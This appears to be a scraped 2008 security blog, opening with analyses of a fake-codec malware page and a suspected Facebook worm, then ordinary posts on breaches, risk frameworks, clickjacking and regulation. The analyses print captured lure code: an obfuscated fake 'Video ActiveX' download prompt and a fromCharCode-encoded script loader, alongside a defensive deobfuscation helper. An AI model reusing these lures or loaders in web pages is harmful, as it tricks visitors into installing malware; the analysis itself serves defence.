{script} document.getElementById('w_content').innerHTML = "Your bro"+"wser ca"+"nnot dis"+"play th"+"is vi"+"deo fi"+"le. You nee"+"d to dow"+"nload new "+"vers"+"ion of Vid"+"eo Ac"+"tiveX O"+"bject to play "+"this "+"video "+"file.{"+"br}{"+"br}You need"+" to do"+"wnload new"+" vers"+"ion of Vid"+"eo Ac"+"tiveX Obje"+"ct to p"+"lay th"+"is v"+"ideo f"+"ile.";{/script}
{table width="458" height="52" cellpadding="0" cellspacing="0" style="background-color: #f0f0f0;padding-right: 8px;"}
{table align="right" cellpadding="4" cellspacing="0"}
{td}{input type="button" value="Continue" onClick="Downloadings('iax');" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" tabindex="1" ID="Button1" NAME="Button1"}{/td}
{td}{input type="button" value="Cancel" onClick="Close()" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" ID="Button3" NAME="Button3"}{/td}
{td}{input type="button" value="Details..." onClick="Details()" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" ID="Button3" NAME="Button3"}{/td}
{td width="8" style="background-image:url(/img/vista-bgright.gif);"}{/td}
{td height="8" width="8" style="background-image:url(/img/vista-lbc.gif);"}{/td}
{td height="8" width="458" style="background-image:url(/img/vista-bgbottom.gif);"}{/td}
{td height="8" width="8" style="background-image:url(/img/vista-rbc.gif);"}{/td}
if (navigator.userAgent.indexOf("Firefox")!=-1) {
if (detecting()) { } else {
setTimeout("Close();", 1000);
else {
if (detecting()) { } else {

function showPopDiv()
var sFlag = "No";
var byFlag = false;
var FlagAr = sFlag.split("");

if (FlagAr[0]=="1"){byFlag = true;}
if (FlagAr[0]=="3"){byFlag = true;}

if(!byFlag) {
var p=document.getElementById("popdiv");
wmpheight=document.body.clientHeight/2-120; = wmpheight; = wmpwidth; = "visible";


{table id="movie" align="center" cellpadding="0" cellspacing="0"}{tr}{td id="playMov"}{a href=""}{img width="450" style="cursor:pointer;" onMouseOver="window.status = window.transcode[2];" height="369" border="0" alt="You must download Video ActiveX Object to play this video file." src="/img/mov.gif"/}{/a}{/td}{/tr}{/table}


Final Word:
Wow! Thanks Rob for that analysis... Looking through all that code, redirects and misdirection you can clearly see the final result is an attempt to get the user to install some setup.exe file, as a "missing codec" for whatever video you are presumably being redirected to. Fascinating! If anyone has been able to grab that setup.exe file please let me know, I have not been able to get it to download properly as of this morning.

Saturday, November 8, 2008

FaceBook Worm? Hack? or Worse?

Greetings from frigid Chicago!

For those of you who have accounts on these social networking sites, you know there is nothing more annoying than SPAM in your mailbox; or worse - some kind of nasty in there. Well, tonight I opened my FaceBook inbox and looked at a very strange-looking message from a friend. What struck me is that it wasn't someone that regularly sends me messages, much less links with cryptic and odd descriptions. Since this caught my attention, I decided to proceed further (using my VMWare sandbox, of course) and decided to document what I think may be a worm of some sort propagating. While I wouldn't normally jump to such a conclusion - I say this because I pinged my friend and asked him if he had sent the message and he had no idea what I was talking about.

Here's what I've been able to find so far.

1. First, let's look at the message itself (screen shot):

So I found this fascinating. First, it appears to be one of those "blanket messages" that would appear normal for most inboxes, except that the two of us generally don't send messages back and forth with cryptic subjects like that... much less such a cryptic body with a strange link.

2. Then I decided to fire up my VMWare sandbox and follow the link, for better or worse; from within FaceBook. This is what I found...

I was fascinated that FaceBook was able to determine (through their internal workings) that the site I was about to navigate to was malicious. Interesting! Of course, this wouldn't deter me.

3. Navigating to that malicious site, using FireFox with NoScript on, I got this little gem captured for your viewing pleasure... What's interesting is that the 76.x.x.x address there is my IP...

4. I then went and captured the landing page that gave me the above screen shot, the code from that page is here:
{script language="JavaScript"}var PUpage="76001548"; var PUprop="geocities"; {/script}{script language="JavaScript" src=""}{/script}{script language="JavaScript"} var thGetOv=""; var thCanURL=""; var thSpaceId="76001548"; var thIP=""; var thTs="1226206771"; var thCs="6903e27d9a64b4137d7d872f68c57349";{/script}{noscript}{link rel="stylesheet" href=""}{/noscript}{script language="JavaScript" src=""}{/script}
{!-- text above generated by server. PLEASE REMOVE --}
{html}{head}{script}function handleError(){try{window.parent.location=location;}catch(e){}try{;}catch(e){}}window.onerror=handleError;if(window.parent.frames.length}0){if(window.parent.document.body.innerHTML){}}{/script}{script}document.write(String.fromCharCode(96+60-96,96+115-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+32-96,96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+104-96,96+116-96,96+116-96,96+112-96,96+58-96,96+47-96,96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,96+97-96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+102-96,96+111-96,96+47-96,96+106-96,96+115-96,96+47-96,96+106-96,96+115-96,96+46-96,96+106-96,96+115-96,96+39-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+62-96));{/script}{title}Angelina Jolie Fucking Cartoons{/title}{/head}{body}
{!-- following code added by server. PLEASE REMOVE --}
{link href="" rel="stylesheet" type="text/css"}{script language="JavaScript" src=""}{/script}
{!-- preceding code added by server. PLEASE REMOVE --}This is video with you. You're doing something funny there.{/body}{/html}{!-- text below generated by server. PLEASE REMOVE --}{/object}{/layer}{/div}{/span}{/style}{/noscript}{/table}{/script}{/applet}{script language="JavaScript" src=""}{/script}{script language="JavaScript" src=""}{/script}{script language="javascript"}geovisit();{/script}{noscript}{img src="" alt="setstats" border="0" width="1" height="1"}{/noscript}

I highlighted in red the part that I found most interesting. I haven't converted that yet - but will shortly and post that as well. I think it's interesting, at very least.

Here is that string again, in case Blogger doesn't wrap properly.
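Both pages above hide their strings the same two ways: the chopped-up concatenation in Rob's dissection ('V'+'i'+'d'+'eo Act'+...) and the String.fromCharCode(96+60-96, ...) arithmetic in step 4. Both can be undone statically, without ever running the script. This is an added Python helper, not part of the original post or Rob's analysis; the sample inputs are constructed to use the same two patterns (the live fromCharCode line from step 4 can be fed to it the same way).

```python
import re
from typing import List

# A JS string literal: single- or double-quoted, backslash escapes allowed, no raw newlines.
_STR = r"""(?:'(?:[^'\\\n]|\\.)*'|"(?:[^"\\\n]|\\.)*")"""
_LIT_RE = re.compile(_STR)
# A chain of two or more literals joined with '+', e.g. 'V'+'i'+'d'+'eo Act'+'iv'+'eX'.
_CONCAT_RE = re.compile(_STR + r"(?:\s*\+\s*" + _STR + r")+")
# String.fromCharCode(...) with a flat argument list (no nested calls).
_FCC_RE = re.compile(r"String\.fromCharCode\s*\(([^()]*)\)")


def _unescape(lit: str) -> str:
    """Strip the quotes from a JS literal and resolve the escapes these pages use."""
    body = lit[1:-1]
    return body.replace("\\'", "'").replace('\\"', '"').replace("\\n", "\n")


def _quote(s: str) -> str:
    """Re-emit a decoded string as one double-quoted JS literal."""
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"').replace("\n", "\\n") + '"'


def _eval_int_expr(expr: str) -> int:
    """Evaluate a '96+60-96' style sum of integer literals. Anything else is rejected,
    so a hostile page cannot smuggle real code through an eval()."""
    if not re.fullmatch(r"\s*\d+(?:\s*[+-]\s*\d+)*\s*", expr):
        raise ValueError("unsupported fromCharCode argument: %r" % expr)
    return sum(int(t.replace(" ", "")) for t in re.findall(r"[+-]?\s*\d+", expr))


def collapse_concats(js: str) -> str:
    """Join every 'a'+'b'+'c' chain back into a single literal."""
    def join(m):
        return _quote("".join(_unescape(p) for p in _LIT_RE.findall(m.group(0))))
    return _CONCAT_RE.sub(join, js)


def decode_fromcharcode_calls(js: str) -> List[str]:
    """Return the text each String.fromCharCode(...) call builds, in source order."""
    decoded = []
    for m in _FCC_RE.finditer(js):
        args = [a for a in m.group(1).split(",") if a.strip()]
        decoded.append("".join(chr(_eval_int_expr(a)) for a in args))
    return decoded


def deobfuscate(js: str) -> str:
    """Rewrite both tricks in place so the page reads the way the browser sees it."""
    js = collapse_concats(js)
    return _FCC_RE.sub(lambda m: _quote(decode_fromcharcode_calls(m.group(0))[0]), js)


def hidden_markup(js: str) -> List[str]:
    """Decoded strings that smuggle markup or a download: the part an analyst wants flagged."""
    markers = ("<script", "<iframe", "<embed", ".exe", "location.href")
    found = decode_fromcharcode_calls(js) + [
        "".join(_unescape(p) for p in _LIT_RE.findall(m.group(0)))
        for m in _CONCAT_RE.finditer(js)
    ]
    return [s for s in found if any(k in s.lower() for k in markers)]


# Constructed samples (not the live pages) using the same two patterns seen above.
SAMPLE_CONCAT = (
    "window.transcode[1] = 'Pl'+'e'+'as'+'e ins'+'ta'+'ll ne'+'w ve'+'rs'+'i'+'on of V'"
    "+'id'+'e'+'o Ac'+'ti'+'ve'+'X Ob'+'je'+'ct.';"
)
SAMPLE_CHARCODE = (
    "document.write(String.fromCharCode(96+60-96,96+115-96,96+99-96,96+114-96,"
    "96+105-96,96+112-96,96+116-96,96+62-96));"
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_CONCAT))
    print(deobfuscate(SAMPLE_CHARCODE))
    print("flagged:", hidden_markup(SAMPLE_CHARCODE))
```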

5. Within h.php I found something else that was interesting. Here that is:
{script language="JavaScript1.1" type="text/javascript"}

document.write('{table title="Phulki is a FREE search engine for Bollywood Music. Take a spin !!" bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw0" onfocus="ss(\'go to \',\'aw0\')" onmouseover="ss(\'go to \',\'aw0\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw0" target="_top" href="*" onfocus="ss(\'go to \',\'aw0\')" onmouseover="return ss(\'go to \',\'aw0\')" onmouseout="cs()"}Enjoy Unlimited Desi Music{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Phulki is a FREE search engine for Bollywood Music. Take a spin !!{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Includes free web page, email & domain forwarding, 24-7 support." 
bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw1" onfocus="ss(\'go to \',\'aw1\')" onmouseover="ss(\'go to \',\'aw1\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw1" target="_top" href="**" onfocus="ss(\'go to \',\'aw1\')" onmouseover="return ss(\'go to \',\'aw1\')" onmouseout="cs()"}Great Value! Domain{br /}Names from Yahoo!{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Includes free web page, email & domain forwarding, 24-7 support.{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Phulki is a FREE search engine for Bollywood Music. Take a spin !!" 
bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw2" onfocus="ss(\'go to \',\'aw2\')" onmouseover="ss(\'go to \',\'aw2\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw2" target="_top" href="*" onfocus="ss(\'go to \',\'aw2\')" onmouseover="return ss(\'go to \',\'aw2\')" onmouseout="cs()"}Enjoy Unlimited Desi Music{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Phulki is a FREE search engine for Bollywood Music. Take a spin !!{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Reliable plans w/ free 24-7 support, domain, hosting, and email. $50 setup fee waived." 
bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw3" onfocus="ss(\'go to \',\'aw3\')" onmouseover="ss(\'go to \',\'aw3\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw3" target="_top" href="**" onfocus="ss(\'go to \',\'aw3\')" onmouseover="return ss(\'go to \',\'aw3\')" onmouseout="cs()"}E-commerce Solutions{br /}from Yahoo!{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Reliable plans w/ free 24-7 support, domain, hosting, and email. $50 setup fee waived.{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');{/script}

So, I'm still doing some more analysis on this (feel free to contact me if you beat me to the punch, and I'll post it and credit you).

Thursday, November 6, 2008

Windows Crash at O'Hare Airport Terminal

In my travels I go through a lot of airports, and every once in a while I run into something that gets my attention and I have to pull out my cell phone camera and snap a picture. Coming home from Detroit tonight... I just had to have this for my "Priceless" collection.

I know, it's not necessarily a "security issue"... but it's a chuckle in a very tough week so bear with me. You'll notice that the offending driver is sysaudio.sys, which is strange because this terminal doesn't actually play any sound... at least not that I've ever heard/seen when it was working.

We really are "Greening" the City of Chicago... wait, what?

Such a waste of a beautiful touch-screen display.

Tuesday, November 4, 2008

Is Nothing Sacred? Data Breach at Texas Lottery


Apparently you're not even safe playing the Lottery lately.

In this article from October 31st (a little dated, I know, but just getting around to reading this) it's apparent that lax data security policies and poor judgment were the cause of this breach. What's astonishing is the complete and utter disregard this employee had for the super-sensitive data (including social security numbers) he "copied and burned to DVD"... what's even more disturbing is his motive:
"I indiscriminately copied all the files from the My DOC folder to a CD/DVD which I carried (to subsequent jobs)"... The employee added he wanted the information "for possible future reference as a programmer at other state agencies."
What possible future reference could he have had from this live data about real people? It continues to amaze me how people just haven't paid attention to the news media and other information outlets discussing how dangerous information like social security numbers is. Did this guy crawl out from under a rock?

Saturday, November 1, 2008

index.asp Server Error

Sometimes, words just don't do a broken index.asp page justice.

What's wrong with this picture?

Friday, October 31, 2008

Risk Rating - When Is Critical Not?

I apologize if you're reading this twice - but it's important enough I wanted to publicize as much as possible.

Over on my other HP blog, I posted an article on Risk Ratings, and the notion that critical isn't always critical - but "tools" just don't do risk ratings justice. I'm looking for feedback, serious thoughts, and volunteers to help me take this research to the next level.

Please read:
Following the White Rabbit:

Thank you.

Tuesday, October 28, 2008

Framework for Realistically Addressing IT Risk (Security Issues)

Better security is often the result of a poorly-timed disaster... -me
Man is an impulsive creature... We tend to try and solve problems before we fully understand their nature.

Once you accept that as truth, you can begin to realize why IT Security and Risk Management is in such a sorry state, and why we're perpetually bailing water from a sinking ship. Risk is a difficult concept to understand, I get that; it took me arguably 8 years into my IT career to fully grasp that risk is a "gray" area and never binary. For many "IT Security" practitioners I've worked with over the years this is where things go south.

After thinking about the causes for poor risk mitigation and security practices in today's business world, I've channeled my efforts into developing a way to lay out the problem-solving process that makes sense, and can get us closer to the zero-horizon than we've previously been able to come. Here's what I have been able to come up with... keep in mind it's still a work-in-progress but I'm putting it out there so as to solicit responses and maybe help me refine this process. Think of it as a ... practical guide to security/risk problems.

These are the steps that I feel one (or many) should go through to resolve any clear and present danger facing an IT Security/Risk group...

  1. Admit there is a problem - Take your head out of the sand, admit there are issues that need to be addressed and begin to try and gather the "big picture" around the existence of these issues. Just admitting there is a problem is the first step, but often the hardest.
  2. Implement a tactical stop-gap - Stop the bleeding; forget trying to wrap your head fully around the problem... just find a way to stop the bleeding short-term while you work to resolve long-term.
  3. Understand the nature of the problem - Now that you've got the wound triaged, look deeper and wider into the actual nature of the issue. Look beyond IT, "think outside the box", ask for other input from people who may have a different perspective.
  4. Admit the resultant risk will never be zero (full resolution) - You will never bring the risk equation all the way down to zero; never going to happen. I think it's paramount that those attempting to mitigate the risk understand this.
  5. Resolve to work towards a realistic strategic solution - Forget the perfect Utopia-like resolution where everything is perfect (see step 4)... set realistic goals for mitigation, and resolve to get there in a sane manner. Put this on paper, tack it somewhere everyone will see it.
  6. Provide real effort to resolve the problem holistically - In order to resolve a problem dealing with real-world risks, real-world efforts must be made. Think beyond your walls, identify all possible permutations of this risk and provide effort to resolve this holistic problem. This costs time, money, and resources. Be prepared for those costs, allocate them in advance or you'll doom yourself to fail.
  7. Implement the strategic resolution in good-faith - Once there is a resolution it'll take real effort (see #6) by your business to implement this resolution. Make sure you have solid backing from the business... not just IT.
  8. Continue to provide feedback for the future - Risk is never solved with a point-in-time approach. Risk evolves, morphs, and changes the rules just when you think you're safe. You must continue to re-visit to make sure yesterday's strategic resolution still works today.

There you have it. Hopefully this ground-work will help build a more solid foundation for risk-related problem solving.

I welcome your input, feedback, criticism and everything else you may have.
Just be constructive.

Monday, October 27, 2008

T-Mobile Android Has a Vulnerability

Stop the presses. Call your mother. Google Android Mobile (a la T-Mobile G1) has a security issue you say?

Good news first...
  • Google wrote Android with security in mind (we'd like to think) and its applications run within an isolated "sandbox" type environment
  • So... trojan'ing the browser (which is WebKit-based) means you don't get access to the entire system
  • The wording from the body that discovered the flaw (Independent Security Evaluators, ISE) indicates that there is an existing fix for the flaw (which exists in one of the many open-source packages used)
Now the bad news...
Since most people use the browser on their phone for nearly everything, this means that you can't trust the browser in your phone - thus defeating a vast majority of the functionality people crave.
Perhaps it was the rush to market, or perhaps it was the lack of attention to security - I won't speculate; what I can tell you is that it's obvious security researchers couldn't wait to find a flaw in Android... it sure didn't take long.
Does it mean that you shouldn't buy one? Probably not.
Does it mean that Google's security is bad? Probably not.
Does this mean that Android is just another piece of consumer-ized gadgetry? Absolutely.

Friday, October 24, 2008

FDIC Pushes Back ID Theft Red Flags Rule Enforcement

That's right.

As reported by in an article posted today, the FDIC is delaying enforcement of a rule that has been on the books for quite some time because entities covered by this regulation aren't in compliance yet. Although the FDIC initially published a notice to this rule on November 9th, 2007 (enforcing the Fair and Accurate Credit Transactions Act of 2003), and the rule went into effect January 1st, 2008, with compliance required by November 1st, 2008 - this is now being pushed back 6 months because the "we didn't know we needed to comply, give us more time" argument was thrown down. How absolutely irresponsible!
"...FTC observers saw that many industry segments were unaware of the
compliance date..."

Isn't that a little ridiculous? The FDIC attempts to explain itself here, in this release... I understand that it's a good practice to give affected parties ample time to comply before bringing down the hammer (I would say 11 months is fair, wouldn't you?), and according to some of the analysts closer to this issue than I, this rule-enforcement is broadening the entities covered under the 2003 regulation - I still can't see a reason why a reasonable regulations and compliance officer wouldn't figure this out.

I will admit that this goes beyond banks to credit unions, car dealers, and public utilities - basically anyone that handles your credit/personal information. I will further take the stance that this regulation falls under the "It's about da** time" argument, and delaying enforcement is irresponsible at best, and criminally negligent at worst.

Let's analyze what this regulation requires - for those that aren't familiar with it...
"In designing its Program, a financial institution or creditor may incorporate,
as appropriate, its existing policies, procedures, and other arrangements that
control reasonably foreseeable risks to customers or to the safety and soundness
of the financial institution or creditor from identity theft." (Source here)

  • This regulation requires an institution to establish a "Red Flag Program" to have a written policy for detecting identity theft/fraud via "red flag" activities (high-risk activities) which is then enforced within the institution
  • This program is based off of the institution's experience with identity theft (from past incidents?) - which is an interesting requirement...
  • The Program framework requires the use of historic data on identity theft to be pro-active in preventing new and mitigating existing identity theft and fraud
  • More information on the framework and requirements of the program available here.
  • The actual regulation language available here.

Some soapbox commentary:

{Steps on soapbox}
If you are an institution which typically deals (or has dealt in the past) with identity theft or identity-fraud-related activities... it boggles the mind that you would not have a program of "Red Flags" to identify when/how this is happening. I suspect this is a sad commentary on the state of identity theft... it's running so rampant that there are now specific regulations from the Federal Government (FDIC) which are forcing businesses and institutions to implement programs to identify and prevent identity theft and credit fraud. I believe it is a further sad commentary that the FDIC has "relaxed" the enforcement date for businesses based (no doubt) on some lobbying efforts from groups which simply don't feel like complying. Look folks, programs like this don't cost incredible amounts of money to implement. They should be fundamental to all business models, not just banks and credit card companies and retailers.

I firmly believe that institutions which do *not* have these types of programs (are non-compliant) after the May 1st enforcement date and which have incidents of identity theft and fraud should be fined and sued for negligence by anyone who has their identity compromised through these entities. It's black and white here... there is no gray-area. Ordinarily I wouldn't say this but you're either compliant or not. You are either responsible with people's information and have a program in place to detect and root out identity theft and fraud - or you're negligent and should be severely punished.
{steps off soapbox}

Sunday, October 19, 2008

Quantum Crypto - Schneier Commentary in Wired

While ordinarily I have to admit I find some of Bruce's stuff a bit... harsh and pointy, I read his recent commentary on Quantum Cryptography in Wired and found myself nodding my head in agreement.

I don't think it's a secret I tend to be a realist when it comes to security; and often find myself arguing against the concept of "piling on" when there are much weaker links in the chain. Bruce's assertion is that the extra security gained from quantum crypto (the assurance that no one is listening in) is great, but we have bigger problems. Well, no kidding!

I can't remember whom I was talking to about this at OWASP '08 (I think it was RSnake... I'm fairly sure) but the other person's assertion was that encrypting/signing stuff is inherently broken for most applications. Interesting huh? I'm fairly certain it was RSnake (now that I think about it) that said this, referencing MITM (man-in-the-middle) attacks. I include my PGP key in my signature on my personal email - but how do you really know it's coming from me and it wasn't altered along the way? Did I give it to you in person, and did you verify it was really me? See, this builds upon the interesting basic question of how much trust do you have in any given system. Do you trust the PGP key-maintenance system? And if you do, why? Think it over for a minute.

Cryptography really depends on the mechanism of distribution of the key(s), and how "trusted" that mechanism is. Within the ranks of the DoD, I imagine but don't have any first-hand knowledge, they've probably built their own key management system that is ~100% trusted (or darn near 100%). But I digress.

Quantum crypto is a wonderful theoretical concept - but another one of those things that has very little real application beyond academia. Bummer... neat idea though.

Sunday, October 12, 2008

ClickJacking - A Perspective Problem

While ClickJacking is the latest apocalyptic threat in IT Security, I wanted to point out something yet again, as I did back when Dan Kaminsky reported his DNS flaw and it became cataclysmic for its 15 minutes of fame.

I've been reading interviews, insights, write-ups and blogs on ClickJacking, and I've had so many discussions with some of you that my head spins trying to remember it all, but something I saw a couple of days (weeks maybe?) ago is staying with me, so I looked it back up and wanted to briefly talk about it.

This quote from Jeremiah Grossman, is disturbing.
"Recently we're [Grossman & RSnake] told we've been told that it's been known by the browser vendors since 2002." [CGI Security interview, 10/5/08]

Why is this disturbing, do you ask? Think about it. If this statement isn't stretching the truth (and I haven't found Jeremiah to be a sensationalist), then this has been an open, the-sky-is-falling-drop-everything issue for ~6 years. Not 6 days or months, but YEARS. So the question we have to ask ourselves [but already know the answer to] is why in the world is it still an issue in 2008?

I'd love to know a few things:
  • Why did we [security professionals] not freak out about this in 2002?
  • Why haven't IE7+ and Firefox (at least?) resolved this issue dead?
  • Why hasn't the standards body [the W3] taken this up as a standards issue?
The answer is simple, so painfully simple. Functionality wins over "vulnerability" every time.

Now, if you'll excuse me I'm going to go cancel my Internet connection, put a sledge-hammer to my computers and walk around aimlessly.

EDIT: Sun. Oct 12, 2:02pm CDT

I just read Jeremiah's comment, and then started reading the link he posted to the Bugzilla post on the bug Jesse Ruderman first filed in 2002, and Robert O'Callahan's (from Mozilla) continued stance against his views. I think it is important for everyone interested in security to read that thread to really understand what we [security professionals] are up against in the world of technology. Understandably, functionality has always been, and will always be, the antithesis of security.

There is a much, much deeper conversation to be had here. If any of you are going to InfoSec World in Orlando in March, I'd like to get a "thought group" on this topic together. Email me directly and we'll put it together. I'm not saying we're going to solve anything - but maybe we can come up with a better way to think this through as a community.

Friday, October 10, 2008

Closing thoughts for a Friday

Hey folks - just some closing thoughts for a Friday. Hope everyone's had a decent week, and by now you've got a cold one in hand. Here are some thoughts I had as this week tails off into another weekend.
  1. Has anyone paid attention to the sheer stupidity of public services lately with regard to data loss/theft? I mean, seriously! I have a Google Alerts "as it happens" notification set up for "security breach" +data, and if you haven't paid attention, there has been an absolutely stupefyingly overwhelming number of data breaches that involve our government or its entities in some way. Foreign governments, schools, social services - all losing laptops, getting hacked, and the toll is mounting. At last count we're somewhere in the 2MM+ records lost in the past few weeks. When will the carnage stop? (More on this in a future post, as I have some serious research to do. If you'd like to help, ping me directly.)
  2. Cloud computing... so I was talking to a colleague and friend over at PureWire, and he is absolutely religiously convinced that in a short period of time (and I quote) ... "Everyone will be doing it [in-the-cloud security], it's inevitable". I tend to disagree, in fact - I think "In the Cloud" security is a bit of a scary proposition - but I'm hoping to have a 20-questions type of interview posted here on this blog with the folks that are running the gears over at PureWire.
  3. I'm finally going to get around to posting that interview I did with a "semi-ethical-DarkSEO dude" in the next few weeks when things settle down at the ranch a little. It's been sitting on my desktop, and everyone's been killing me to publish it - problem is - it's huge (10+ pages of good info, I think). Does anyone know where I can post it? I'll post part of the interview to the blog here as a teaser, and the rest to a site somewhere, as a PDF/paper. Your suggestions are welcome.

Data Security in Financial Crisis

If you've not looked up from your screen in a while - there is a major world-wide recession underway. When you look around and see a company like Lehman Brothers basically out of business, the first instinct is to panic because the financial markets are clearly crumbling.

Rich Mogull's write-up entitled "Impact of the Economic Crisis on Security" was definitely worth a read, if you've not gotten a chance to read it yet. After you read Rich's blog entry... think about this: what's happening with all the data that's being "liquidated"? Scary, isn't it? Those behemoths of Wall Street hold terabytes of information - PII (personally identifiable information) of all types.

Once again I think we're right to rant and rave about how those CEOs should be behind bars, or worse - but let's consider the data. The data, or what's happening (or going to happen) to it, is what's scaring me to death. I actually have data, my personal information, at some of those failed firms all over the place. When they're liquidated, or parted off and sold... is there a governing body somewhere that's keeping track and making sure disks are wiped clean, digitally shredded so they can't be used in fraud or identity theft? All the government oversight we're proposing today, and the $700Bn (that number boggles my mind) "bailout", and not a single mention of information management anywhere in there.

I think there is a much deeper crisis here than just collapsing financials - because like it or not, that ship will list and right itself, eventually (likely at the expense of you and me, the taxpayers) - but the data that's mis-handled, lost, stolen and forgotten about... who's going to bail ME out when my identity is stolen as a result?

Anyway... thought I'd just share what's on my mind. Feel free to reply, comment and rant with me.

Tuesday, September 30, 2008

Getting Hacked: Arrogance or Ignorance?

Hi readers, I read a fair amount of blogs and occasionally find something I just feel compelled to pass along. This time, though, I came across an article that was too interesting not to share, but which unfortunately highlighted (and I think this was unintentional) something that we [all of us] have badly overlooked.

First, the article. "News of Frauds" is a blog maintained by Piyush Sood. Yesterday he cross-posted an article from written originally by Corinne Iozzio on the most "mysterious" cyber-crimes of all time. While I may not agree with Corinne's assessment of the importance/mysteriousness of these crimes - I think she pointed out a little gem.

If you scroll down to the "Supermarket Security Breech" you'll notice an interesting quote.

"Chain reps and security experts are still unclear as to how the criminals gained access to the system; the 2005 T.J.Maxx breach took advantage of a vulnerability in the chain's wireless credit transfer system, but Hannaford and Sweetbay do not use wireless transfers of any sort."

This quote fascinated me instantly. Of course they may not have known about any wireless - that's kind of the point, isn't it? How many companies are willing to say, on the record, "no, we do not have wireless", only to get hacked through some open access point hidden under someone's desk or in a conference room to 'share network access'? It's a sad commentary, I think.

Saying "we have no wireless" and actually having a policy that prohibits people from hooking up access points at random are two entirely different things. Oddly enough, most companies simply say "we don't allow wireless" and then wonder how they could possibly have gotten hacked when their network is so airtight.

I can't stress this enough. If you don't want something on your network - make a policy against it and be ready to enforce that policy. Otherwise... expect to be hacked. Or at least be ready to have to explain why you're not ready.